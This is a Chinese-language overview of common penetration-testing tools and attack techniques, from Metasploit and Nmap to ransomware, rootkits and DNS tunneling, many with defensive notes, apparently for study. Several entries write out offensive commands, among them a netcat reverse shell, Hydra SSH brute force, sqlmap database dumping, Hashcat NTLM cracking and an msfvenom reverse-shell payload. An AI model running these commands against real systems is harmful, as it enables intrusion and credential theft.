工具
1. Metasploit Framework
• 类别:渗透测试/漏洞利用
• 用途:开发、测试和执行漏洞利用代码,生成Payload(如反向Shell)。
• 场景:利用未修补的漏洞(如永恒之蓝)获取目标系统权限。
2. Nmap
• 类别:网络扫描
• 用途:探测主机、端口和服务,支持脚本扩展(如漏洞检测)。
• 场景:扫描目标网络拓扑,识别开放端口(如nmap -sV 192.168.1.0/24
)。
3. Wireshark
• 类别:流量分析
• 用途:抓包并解析网络协议,分析数据流。
• 场景:捕获HTTP明文密码或检测ARP欺骗攻击。
4. John the Ripper
• 类别:密码破解
• 用途:暴力破解或字典攻击哈希/加密密码。
• 场景:破解Linux系统的/etc/shadow
文件哈希。
5. Aircrack-ng
• 类别:无线攻击
• 用途:破解WiFi密码(WPA/WPA2),分析无线流量。
• 场景:捕获握手包后使用字典破解WiFi密钥。
6. Hydra
• 类别:暴力破解
• 用途:支持多协议(SSH、FTP、RDP)的登录爆破。
• 场景:爆破弱密码的SSH服务(hydra -l user -P passlist.txt ssh://192.168.1.1
)。
7. Burp Suite
• 类别:Web应用测试
• 用途:拦截HTTP请求、扫描漏洞(如XSS、CSRF)。
• 场景:修改请求参数绕过身份验证。
8. sqlmap
• 类别:SQL注入
• 用途:自动化检测和利用SQL注入漏洞。
• 场景:提取数据库内容(如sqlmap -u "http://target.com?id=1" --dump
)。
9. Nikto
• 类别:Web扫描
• 用途:扫描Web服务器配置错误和已知漏洞。
• 场景:检测过时的Apache版本或敏感文件泄露。
10. Netcat
• 类别:网络工具
• 用途:端口监听、文件传输、后门连接。
• 场景:创建反向Shell(nc -lvp 4444
监听,目标执行nc 192.168.1.2 4444 -e /bin/sh
)。
11. Social-Engineer Toolkit (SET)
• 类别:社会工程
• 用途:生成钓鱼页面、恶意邮件或伪装攻击。
• 场景:伪造登录页面窃取用户凭据。
12. OpenVAS
• 类别:漏洞扫描
• 用途:全面扫描系统漏洞,生成详细报告。
• 场景:企业内网漏洞评估。
13. DirBuster/Dirb
• 类别:目录枚举
• 用途:爆破Web目录和文件(如admin后台)。
• 场景:发现隐藏的/backup
目录或配置文件。
14. Maltego
• 类别:信息收集
• 用途:可视化关联分析域名、IP、邮箱等信息。
• 场景:绘制目标组织的网络关系图。
15. Ettercap
• 类别:中间人攻击
• 用途:ARP欺骗、SSL剥离、流量嗅探。
• 场景:窃取局域网内用户的登录凭证。
16. Hping3
• 类别:高级扫描
• 用途:自定义TCP/IP包测试防火墙规则或DoS攻击。
• 场景:检测目标是否过滤特定ICMP类型。
17. Hashcat
• 类别:密码恢复
• 用途:GPU加速破解哈希(支持MD5、SHA256等)。
• 场景:快速破解NTLM哈希(hashcat -m 1000 hash.txt rockyou.txt
)。
18. Cewl
• 类别:字典生成
• 用途:爬取网站内容生成定制化密码字典。
• 场景:针对企业网站生成包含品牌名的字典。
19. Snort
• 类别:入侵检测
• 用途:实时监控网络流量,匹配攻击特征。
• 场景:防御SQL注入或恶意文件下载。
20. tcpdump
• 类别:命令行抓包
• 用途:快速捕获和分析流量(如过滤HTTP请求)。
• 场景:提取FTP传输的明文文件(tcpdump port 21 -w capture.pcap
)。
21. Responder
• 类别:网络投毒
• 用途:劫持LLMNR/NBT-NS请求,窃取NTLM哈希。
• 场景:在内部网络获取用户哈希并中继攻击。
22. Impacket
• 类别:协议利用
• 用途:Python库实现SMB、Kerberos等协议攻击。
• 场景:利用PsExec执行远程命令(如横向移动)。
23. BeEF
• 类别:浏览器利用
• 用途:控制受害者浏览器(如XSS漏洞)。
• 场景:劫持用户会话或发起键盘记录。
24. OWASP ZAP
• 类别:Web扫描
• 用途:自动化查找Web漏洞(如目录遍历)。
• 场景:扫描API接口的安全问题。
25. The Harvester
• 类别:信息收集
• 用途:收集目标域名关联的邮箱、子域名等。
• 场景:通过Google搜索获取员工邮箱列表。
26. Shodan CLI
• 类别:设备搜索
• 用途:查找暴露在互联网的特定设备(如摄像头、数据库)。
• 场景:搜索未防护的Redis服务(shodan search port:6379
)。
27. WPScan
• 类别:WordPress扫描
• 用途:检测插件、主题漏洞及弱密码。
• 场景:利用Timthumb漏洞上传Webshell。
28. Msfvenom
• 类别:Payload生成
• 用途:生成跨平台Payload(如exe、elf、apk)。
• 场景:创建反向TCP的Linux可执行文件(msfvenom -p linux/x64/shell_reverse_tcp
)。
29. Cobalt Strike
• 类别:高级攻击框架
• 用途:团队协作渗透、钓鱼攻击、权限维持。
• 场景:通过钓鱼邮件部署Beacon后门。
30. Ghidra
• 类别:逆向工程
• 用途:分析恶意软件或闭源程序的二进制代码。
• 场景:解密勒索软件加密算法。
技术
1. 后门植入(Backdoor)
• 类别:权限维持
• 原理:在目标系统植入隐蔽通道,绕过正常认证机制。
• 技术细节:
• 方法:修改系统服务、注册表或植入恶意DLL。
• 案例:Meterpreter通过漏洞上传后门,监听特定端口。
• 防御:文件完整性监控(如Tripwire)、禁用未签名服务。
2. DDoS攻击(分布式拒绝服务)
• 类别:资源耗尽
• 原理:通过僵尸网络(Botnet)发送海量请求耗尽目标资源。
• 技术类型:
• SYN Flood:伪造源IP发送半开连接耗尽TCP队列。
• HTTP GET:模拟正常请求占用服务器线程。
• 案例:Mirai僵尸网络攻击DNS服务商Dyn(2016)。
3. Hook技术(API Hooking)
• 类别:进程注入
• 原理:劫持程序API调用,篡改输入输出或记录敏感数据。
• 实现方式:
• Inline Hook:修改函数入口指令跳转到恶意代码。
• DLL注入:通过远程线程加载恶意DLL劫持函数表(IAT)。
• 案例:银行木马通过Hook键盘API窃取网银密码。
4. 中间人攻击(MITM)
• 类别:流量劫持
• 原理:欺骗目标设备将流量路由至攻击者主机。
• 技术实现:
• ARP欺骗:伪造ARP响应绑定攻击者MAC到目标IP。
• SSL剥离:将HTTPS降级为HTTP明文传输。
• 工具:Ettercap、BetterCAP。
5. 钓鱼攻击(Phishing)
• 类别:社会工程
• 原理:伪造可信来源诱导用户提交敏感信息。
• 技术变种:
• 鱼叉钓鱼:针对特定高管定制邮件内容。
• 克隆网站:复制合法网站登录页窃取凭据。
• 案例:伪造Microsoft登录页窃取Office 365账户。
6. SQL注入(SQLi)
• 类别:Web漏洞
• 原理:通过输入恶意SQL语句篡改数据库查询逻辑。
• 攻击方式:
• Union注入:拼接查询语句获取其他表数据。
• 盲注:通过页面响应差异推断数据库内容。
• 自动化工具:sqlmap。
7. XSS(跨站脚本攻击)
• 类别:客户端攻击
• 原理:注入恶意脚本到网页,劫持用户会话。
• 类型:
• 存储型XSS:脚本存入数据库(如论坛评论)。
• 反射型XSS:通过URL参数触发(钓鱼链接)。
• 利用场景:窃取Cookie、重定向到恶意网站。
8. 勒索软件(Ransomware)
• 类别:数据加密
• 原理:使用非对称加密算法(如RSA-2048)锁定文件。
• 传播方式:
• 漏洞利用(如EternalBlue)。
• 恶意邮件附件(.js、.docm)。
• 案例:WannaCry利用SMB漏洞加密全球Windows主机。
9. 僵尸网络(Botnet)
• 类别:分布式攻击
• 原理:通过C&C服务器控制感染主机集群。
• 组建流程:
- 传播恶意软件(蠕虫、木马)。
- 被控主机定期轮询C&C获取指令。
• 用途:DDoS、挖矿、发送垃圾邮件。
10. 社会工程(Social Engineering)
• 类别:心理操纵
• 原理:利用人性弱点(信任、恐惧)获取信息。
• 技术手段:
• 伪装身份:冒充IT部门要求提供密码。
• 诱饵攻击:放置带恶意程序的U盘诱导插入。
11. 漏洞利用(Exploit)
• 类别:代码执行
• 原理:利用软件漏洞(如缓冲区溢出)执行任意代码。
• 利用链:
• 堆喷射(Heap Spray):在内存中预填Shellcode提高命中率。
• ROP链:绕过DEP保护拼接代码片段。
• 工具:Metasploit、Immunity Debugger。
12. ARP欺骗(ARP Spoofing)
• 类别:局域网攻击
• 原理:伪造ARP响应包劫持目标流量。
• 攻击效果:
• 监听同一网段内主机通信。
• 阻断目标网络连接(ARP洪水)。
• 检测:静态ARP绑定、启用DHCP Snooping。
13. DNS劫持(DNS Hijacking)
• 类别:域名欺诈
• 原理:篡改DNS解析结果指向恶意IP。
• 实现方式:
• 入侵本地DNS服务器(如路由器)。
• 修改hosts文件重定向特定域名。
• 案例:攻击者将google.com解析到钓鱼网站。
14. 密码爆破(Brute Force)
• 类别:认证绕过
• 原理:枚举所有可能的密码组合进行尝试。
• 优化手段:
• 字典攻击:使用常见密码库(rockyou.txt)。
• 彩虹表:预计算哈希减少破解时间。
• 工具:John the Ripper、Hashcat。
15. 会话劫持(Session Hijacking)
• 类别:会话控制
• 原理:窃取合法用户的Session ID冒充身份。
• 攻击途径:
• XSS窃取Cookie:document.cookie。
• 嗅探未加密会话(如HTTP协议)。
• 防御:启用HttpOnly、使用HTTPS。
16. Rootkit
• 类别:内核级隐蔽
• 原理:通过驱动或内核模块隐藏进程、文件、网络连接。
• 技术类型:
• 用户态Rootkit:Hook API调用(如readdir)。
• 内核态Rootkit:修改系统调用表(sys_call_table)。
• 检测:内存取证工具(Volatility)。
17. 键盘记录(Keylogger)
• 类别:输入监控
• 原理:记录用户键盘输入并发送至攻击者服务器。
• 实现方式:
• 硬件Keylogger:物理接入USB设备。
• 软件Keylogger:Hook键盘API(Windows WH_KEYBOARD_LL)。
• 案例:间谍软件跟踪员工输入内容。
18. 恶意广告(Malvertising)
• 类别:供应链攻击
• 原理:在合法广告平台投放含恶意代码的广告。
• 攻击链:
- 利用Flash/PDF漏洞触发下载。
- 重定向到Exploit Kit(如Angler)。
• 防御:广告拦截插件、禁用过时插件。
19. 零日攻击(Zero-Day Exploit)
• 类别:未知漏洞利用
• 原理:在厂商发布补丁前利用未公开漏洞攻击。
• 生命周期:
- 漏洞发现(Fuzzing、逆向工程)。
- 开发Exploit并黑市交易。
• 案例:Stuxnet利用4个Windows零日漏洞破坏核设施。
20. 水坑攻击(Watering Hole)
• 类别:定向攻击
• 原理:入侵目标常访问的网站,植入恶意代码。
• 技术链:
- 识别目标群体(如特定行业论坛)。
- 利用CMS漏洞篡改网站JS脚本。
• 案例:攻击者入侵能源公司员工常访问的技术博客。
21. 供应链攻击(Supply Chain)
• 类别:上游污染
• 原理:在软件更新包或依赖库中植入恶意代码。
• 典型场景:
• 开发工具污染:入侵代码编辑器插件市场。
• 硬件后门:路由器固件预装监控模块。
• 案例:SolarWinds Orion更新包被植入后门(2020)。
22. WiFi破解(WPA/WPA2 Cracking)
• 类别:无线攻击
• 原理:捕获握手包后通过字典或彩虹表破解PSK密码。
• 步骤:
- 使用Aircrack-ng解除WiFi客户端关联(Deauth攻击)。
- 捕获四次握手包后使用Hashcat爆破。
• 防御:启用WPA3、使用复杂预共享密钥。
23. 提权攻击(Privilege Escalation)
• 类别:权限提升
• 原理:利用系统配置错误或漏洞获取更高权限(如root)。
• 常见漏洞:
• Linux脏牛(Dirty COW):竞争条件漏洞改写只读内存。
• Windows MS17-010:通过SMB服务获取SYSTEM权限。
• 工具:LinPEAS、Windows-Exploit-Suggester。
24. API滥用(API Abuse)
• 类别:接口攻击
• 原理:利用API设计缺陷进行未授权操作或数据泄露。
• 攻击方式:
• 速率限制绕过:伪造IP或使用代理池轰炸API。
• 参数篡改:修改用户ID越权访问他人数据(IDOR)。
• 案例:Facebook API漏洞泄露5000万用户数据(2018)。
25. 恶意软件(Malware)
• 类别:综合攻击
• 原理:通过病毒、蠕虫、木马破坏或控制目标系统。
• 传播载体:
• 宏病毒:Office文档内嵌VBA脚本。
• 文件捆绑:将木马与正常软件(如游戏外挂)合并。
• 检测:沙箱分析(Cuckoo Sandbox)、签名查杀。
26. 端口扫描(Port Scanning)
• 类别:信息收集
• 原理:探测目标开放端口以识别服务及漏洞。
• 技术变种:
• SYN扫描:半开放扫描躲避日志记录。
• UDP扫描:检测DNS、SNMP等UDP服务。
• 工具:Nmap、Masscan。
27. 格式化字符串攻击(Format String)
• 类别:内存破坏
• 原理:利用未过滤的格式化字符串(如%n
)读写栈内存。
• 利用效果:
• 泄露栈内敏感数据(如Canary值)。
• 覆盖返回地址执行Shellcode。
• 防御:禁用%n
格式符、启用ASLR。
28. 缓冲区溢出(Buffer Overflow)
• 类别:内存攻击
• 原理:输入超长数据覆盖相邻内存,控制程序执行流。
• 利用条件:
• 未启用栈保护(如Canary)。
• 未限制输入长度(如C语言gets函数)。
• 案例:MS08-067漏洞利用溢出获取系统权限。
29. DNS隧道(DNS Tunneling)
• 类别:数据外泄
• 原理:将数据编码至DNS查询请求绕过防火墙检测。
• 技术实现:
• 使用子域名(如data.attacker.com
)传输Base64编码数据。
• 通过TXT记录接收响应指令。
• 工具:DNScat2、iodine。
30. WebShell
• 类别:Web后门
• 原理:上传可执行脚本(如PHP、ASP)控制Web服务器。
• 功能:
• 执行系统命令、浏览文件系统。
• 作为跳板攻击内网其他主机。
• 检测:Web日志分析、静态文件扫描。